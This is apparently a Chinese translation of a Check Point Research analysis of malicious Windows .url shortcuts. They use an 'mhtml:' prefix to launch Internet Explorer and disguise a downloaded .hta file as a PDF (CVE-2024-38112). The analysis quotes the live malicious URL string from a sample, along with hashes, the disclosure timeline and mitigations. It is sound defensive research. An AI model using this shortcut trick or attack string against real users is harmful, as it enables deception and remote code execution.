引言和背景
Check Point Research 最近发现,攻击者一直在使用新颖(或之前未知)的技巧来诱使 Windows 用户进行远程代码执行。具体来说,攻击者使用了特殊的 Windows 快捷方式文件(.url 扩展名),当点击时,会调用已退役的 Internet Explorer (IE) 访问攻击者控制的 URL。在 IE 中使用了额外的技巧来隐藏恶意的 .hta 扩展名。通过使用 IE 而不是 Windows 上现代且安全得多的 Chrome/Edge 浏览器打开 URL,攻击者在利用受害者的计算机方面获得了显著优势,尽管计算机运行的是现代的 Windows 10/11 操作系统。
就一些技术背景而言,攻击者使用 .url 文件作为他们活动中的初始攻击向量并不罕见。即使使用新颖或零日 url 文件相关的漏洞也发生过——CVE-2023-36025,这是去年 11 月刚刚修补的一个好例子。
我们发现的恶意 .url 样本可以追溯到最早的2023 年 1 月(一年多以前)到最新的2024 年 5 月 13 日(写作时几天前)。这表明攻击者已经使用这种攻击技术有相当长一段时间了。
通过“mhtml”技巧复活 Internet Explorer
让我们以 Virus Total 上最新的 .url 样本 为例来解释这种技术。
样本的内容:
图 1:恶意 .url 样本的内容
图 1:恶意 .url 样本的内容
正如我们所看到的,.url 文件的最后一行字符串指向 Microsoft Edge 应用程序文件 msedge.exe
中的自定义图标。这会让它看起来像是指向一个 PDF 文件(但实际上并不是)。
重要的是,正如我们所看到的,URL
关键词的值与通常的不同——通常,对于常见的 .url 文件,URL
参数看起来像 URL=https://www.google.com
指向 URL https://www.google.com
。但在本样本中,值是:
mhtml:http://cbmelipilla.cl/te/test1.html!x-usc:http://cbmelipilla.cl/te/test1.html
它使用了一个特殊的前缀 mhtml:
并且在中间还有一个 !x-usc:
。
几年前,我们在臭名昭著的 CVE-2021-40444 零日攻击 中看到了相同的技巧(我们称之为“mhtml”技巧),其中文件 document.xml.rels
包含了完全相同的字符串。
图 2:CVE-2021-40444 漏洞利用样本中的关键内容
图 2:CVE-2021-40444 漏洞利用样本中的关键内容
我们知道“mhtml”技巧以前在利用 CVE-2021-40444 漏洞的 Word 文档中使用过,现在我们看到同样的技巧被用在了 .url 文件中。那么,攻击者通过使用这个能实现什么呢?让我们做一些测试。
如果我们将样本重命名为 Books_A0UJKO.pdf.url
(野外的名称),在完全修补过的 Windows 11 上,.url 文件将如下所示——看起来像是指向一个 PDF 文件的链接。
图 3:恶意 .url 文件在 Windows 11 上显示为指向 PDF 文件的链接
图 3:恶意 .url 文件在 Windows 11 上显示为指向 PDF 文件的链接
如果我们像受害者一样行动(我们想打开 PDF),我们双击快捷方式文件。然后,受害者会得到这个:
图 4:当受害者双击 .url 文件时,IE 和提升窗口对话框出现
图 4:当受害者双击 .url 文件时,IE 和提升窗口对话框出现
看看那里有什么奇怪的?Internet Explorer 被打开了。事实上,通过一些调试技巧,我们能够确认 IE 的确被用来打开链接 http://cbmelipilla[.]cl/te/test1.html
,这在 .url 文件中指定。
众所周知,微软几年前宣布 IE 退役。在典型的 Windows 10/11 上,正常的用户行为不应该能够打开 IE 访问网站,因为它们没有现代浏览器同样的安全水平。IE 是一个过时的网页浏览器,以其不安全而闻名——这是微软用现代且更安全的 Microsoft Edge 替代它的主要原因,或者用户只是安装并使用来自 Google 的 Chrome 浏览器。
免责声明:尽管 IE 已被宣布“退役且不再支持”,严格来说,IE 仍然是 Windows 操作系统的一部分,并且“并非固有不安全,因为 IE 仍然会针对安全漏洞进行服务,并且不应该存在已知的可利用的安全漏洞”,根据我们与微软的沟通。
因此,默认情况下,用户不应该使用 IE 打开网站,除非用户特别要求这样做,并且完全知情。
然而,在本样本中,使用“mhtml”技巧,当受害者打开 .url 快捷方式(受害者认为他/她正在打开一个 PDF),攻击者控制的网站正在使用 IE 打开,而不是典型的 Chrome/Edge。
从那里(网站使用 IE 打开),攻击者可以做很多坏事,因为 IE 不安全且过时。例如,如果攻击者拥有 IE 零日漏洞——与 Chrome/Edge 相比,这更容易找到,攻击者可以立即攻击受害者以获得远程代码执行。然而,在我们分析的样本中,攻击者没有使用任何 IE 远程代码执行漏洞。相反,他们使用了 IE 中的另一个技巧——据我们所知,这可能之前不是公开已知的——来欺骗受害者以获得远程代码执行。
额外的 IE 技巧 – 隐藏 .hta 扩展名
让我们再次回顾前面的图(下面突出显示)。根据提升的(IE)对话框,它似乎要求用户打开一个名为 Books_A0UJKO.pdf
的 PDF 文件。
图 5:更仔细地查看 IE 对话框 - 只显示 PDF 文件名
图 5:更仔细地查看 IE 对话框 – 只显示 PDF 文件名
然而,这里真的是这样吗?你认为你在打开一个 PDF 吗?
并非如此。如果我们在上述 IE 对话框上点击“打开”(默认选项),我们将得到另一个提升的对话框(见下文)。这是因为 IE 的保护模式(一个相对较弱的浏览器沙箱)。
图 6:IE 保护模式警告对话框
图 6:IE 保护模式警告对话框
如果受害者继续忽略警告(因为受害者认为他/她正在打开一个 PDF),最终受害者的机器将被黑客攻击——“打开”的文件实际上是一个正在下载和执行的恶意 .hta 文件。
如果我们仔细观察 HTTP 流量,我们将发现许多不可打印的字符附加到 Books_A0UJKO.pdf
字符串的末尾。最后,有 .hta 字符串——这是真正的(和危险的)扩展名。
图 7:HTTP 流量显示访问的全部 URI
图 7:HTTP 流量显示访问的全部 URI
这正是 IE 对话框没有向用户显示 .hta 文件名的原因。真正的完整 URL 是:
有了这个技巧,攻击者可以更成功地诱使受害者继续采取行动,而实际上,受害者正在下载和执行一个危险的 .hta 应用程序。
相关恶意 .url 样本 ITW
bd710ee53ef3ad872f3f0678117050608a8e073c87045a06a86fb4a7f0e4eff0 b16aee58b7dfaf2a612144e2c993e29dcbd59d8c20e0fd0ab75b76dd9170e104 65142c8f490839a60f4907ab8f28dd9db4258e1cfab2d48e89437ef2188a6e94 bfd59ed369057c325e517b22be505f42d60916a47e8bdcbe690210a3087d466d 22e2d84c2a9525e8c6a825fb53f2f30621c5e6c68b1051432b1c5c625ae46f8c c9f58d96ec809a75679ec3c7a61eaaf3adbbeb6613d667257517bdc41ecca9ae
防御和缓解
我们已经确认,讨论的利用技巧——至少在野外积极使用了一年,并且在最新的 Windows 10/11 操作系统上有效。
Check Point 已经在 IPS 和 Harmony 电子邮件上发布了以下保护措施,IPS 签名名为“Internet Shortcut File Remote Code Execution”,为我们的客户提供了比这篇文章提前几个月的保护,以防止这种零日攻击。
Harmony 电子邮件和协作 在最高安全级别上提供全面的内联保护,以防止这种零日攻击。
我们在 2024 年 5 月 16 日星期四向 Microsoft 安全响应中心(MSRC)报告了我们的发现。从那时起,双方一直在密切合作处理此事,最终在 7 月 9 日发布了一个 Microsoft 官方补丁 (CVE-2024-38112)。强烈建议 Windows 用户尽快应用补丁。
对于担心的 Windows 用户,我们建议对来自不信任来源的 .url 文件格外警惕。正如我们所讨论的,这种类型的攻击需要几次警告(用户交互)才能成功。
Check Point Research 继续监视全球范围内与此类攻击相关的活动。
结论
从利用的角度总结攻击:这些活动中使用的第一个技巧是“mhtml”技巧,它允许攻击者调用 IE 而不是更安全的 Chrome/Edge。第二个技巧是 IE 的技巧,让受害者相信他们正在打开一个 PDF 文件,而实际上,他们正在下载和执行一个危险的 **.**hta 应用程序。这些攻击的总体目标是让受害者相信他们正在打开一个 PDF 文件,这是通过使用这两种技巧实现的。
